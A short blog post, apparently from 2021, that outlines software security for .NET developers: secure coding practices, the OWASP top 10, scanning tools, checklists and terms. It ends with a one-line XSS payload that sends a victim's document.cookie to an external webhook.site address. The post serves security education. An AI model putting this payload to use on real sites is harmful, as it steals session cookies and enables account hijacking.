Software security for .Net developers
2 min readMar 8, 2021
When and why should we think about security?
Secure Coding Practices
- Input Validation
- Output Encoding
- Authentication and Password Management
- Session Management
- Access Control
- Cryptographic Practices
- Error Handling and Logging
- Communication Security
- System Configuration
- Database Security
- File Management
- Memory Management
- General Coding Practices
OWASP top 10 for WEB
- Injection
- Broken Authentication
- Sensitive Data Exposure
- XML External Entities (XXE)
- Broken Access Control
- Security Misconfiguration
- Cross-Site Scripting (XSS)
- Insecure Deserialization
- Using Components. with known vulnerabilities
- Insufficient Logging&Monitoring
Weaknesses and vulnerabilities
What is the difference between a vulnerability and a weakness?
Weaknesses are errors that can lead to vulnerabilities.
Common Weaknesses Enumeration
Common Vulnerabilities and Exposures
Application security assessment tools
- sqlmap (open source, SQL injections)
- OWASP ZAP (open source, web app scanner)
- Burp Suite (community edition is free, exploring web security)
Analyze project dependencies
Platforms for practicing
Useful Checklists
- OWASP Application Security Verification Standard 4.0
- OWAS DotNet Security Cheat Sheet
- OWASP REST Security Cheat Sheet
- Transport Layer Protection Cheat Sheet
Useful links
Some useful terms you should know
- Symmetric vs. Asymmetric Encryption
- Use signature for request payload
- Denial of service (Dos)
- Brute force attack
- Spoofing
- Phishing
- Sanitization
Useful code samples
XSS to get cookie
<img src=x onerror=this.src=’https://webhook.site/63dc6b4e-3f8f-468e-bb3e-9134e31c39da/?c='+document.cookie>